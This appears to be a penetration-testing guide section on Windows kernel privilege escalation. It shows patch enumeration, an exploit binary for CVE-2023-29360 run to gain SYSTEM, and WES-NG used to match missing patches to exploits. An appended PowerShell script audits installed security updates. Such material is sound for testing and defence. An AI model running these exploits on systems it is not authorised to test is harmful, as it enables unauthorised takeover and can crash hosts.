Kernel
Kernel exploits leverage Windows kernel vulnerabilities and typically yield high privileges, but they require advanced knowledge and carry a high risk of crashing the system.
> systeminfo
Host Name: CLIENTWK220
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22621 N/A Build 22621
...

# enumerate security patches
> Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }
Source Description HotFixID InstalledBy InstalledOn
------ ----------- -------- ----------- -----------
Security Update KB5025239 5/4/2023 12:00:00 AM
Security Update KB5025749 5/4/2023 12:00:00 AM
Security Update KB5017233 9/25/2022 12:00:00 AM

> whoami
clientwk220\steve
> .\CVE-2023-29360.exe
[+] Device Description: Microsoft Streaming Service Proxy
Hardware IDs:
"SW\{96E080C7-143C-11D1-B40F-00A0C9223196}"
[+] Device Instance ID: SW\{96E080C7-143C-11D1-B40F-00A0C9223196}\{3C0D501A-140B-11D1-B40F-00A0C9223196}
[+] First mapped _MDL: 20c2f3c00c0
[+] Second mapped _MDL: 20c2f3d0040
[+] Unprivileged token reference: ffffbc053be6d06d
[+] System token reference: ffffbc052ea7d496
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.
> whoami
nt authority\system

Windows vulnerabilities such as CVE-2023-29360 are listed in the Microsoft Security Update Guide, and the corresponding security updates can be looked up in the Microsoft Update Catalog.
WES-NG
Windows Exploit Suggester – Next Generation (WES-NG) is a post-exploitation tool that analyzes Windows system information to identify unpatched vulnerabilities and associated exploits. It supports all Windows OSs from XP through Windows 11, including server editions.
# Clone the repo
git clone https://github.com/bitsadmin/wesng --depth 1
# Update
wes.py --update
# systeminfo > systeminfo.txt on the target host
wes.py systeminfo.txt -e

This tool can generate a lot of false positives: make sure to check here how to eliminate them. The tool can also validate findings against Microsoft's Update Catalog using the --muc-lookup option to reduce false positives, as the raw MSRC feed can be incomplete.
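The patch enumeration above and the WES-NG input step can be combined into one audit script run from the defender's side. The following is an added example, not code from the original page or from the WES-NG project: it checks the host's installed security updates against a list of expected KBs (the three KB IDs from the page's output are used as a constructed sample; the `$ExpectedKBs` name and the list itself are assumptions), flags any that are missing, and writes the systeminfo export that wes.py consumes.

```powershell
# Added example (not from the original page): audit installed security updates
# on a Windows host and prepare the systeminfo export that WES-NG reads.
# $ExpectedKBs is a constructed sample taken from the page's output, not a
# complete baseline; replace it with the KBs your patch policy requires.
$ExpectedKBs = @('KB5025239', 'KB5025749', 'KB5017233')

# Installed security updates, via the same CIM class the page enumerates
$installed = Get-CimInstance -ClassName Win32_QuickFixEngineering |
    Where-Object { $_.Description -eq 'Security Update' }

$installedIds = $installed | Select-Object -ExpandProperty HotFixID

# One row per expected KB: present or not, and when it was installed
$report = foreach ($kb in $ExpectedKBs) {
    $match = $installed | Where-Object { $_.HotFixID -eq $kb } | Select-Object -First 1
    [PSCustomObject]@{
        HotFixID    = $kb
        Installed   = ($installedIds -contains $kb)
        InstalledOn = if ($match) { $match.InstalledOn } else { $null }
    }
}
$report | Format-Table -AutoSize

# Anything missing is a candidate for the unpatched-vulnerability checks
# that WES-NG performs; surface it clearly for the patch owner.
$missing = $report | Where-Object { -not $_.Installed }
if ($missing) {
    Write-Warning ('Missing security updates: ' + ($missing.HotFixID -join ', '))
}

# Most recently installed security update, a quick indicator of patch lag
$latest = $installed | Sort-Object InstalledOn -Descending | Select-Object -First 1
if ($latest) {
    "Latest security update: $($latest.HotFixID) installed on $($latest.InstalledOn)"
}

# Export systeminfo for offline analysis with: wes.py systeminfo.txt
# (equivalent to the page's `systeminfo > systeminfo.txt`)
systeminfo | Out-File -FilePath .\systeminfo.txt
```

Run the script in an elevated or standard PowerShell session on the host being audited; Win32_QuickFixEngineering only lists updates installed through Component-Based Servicing, so updates delivered by other channels may not appear, which is one reason to cross-check WES-NG's findings with --muc-lookup.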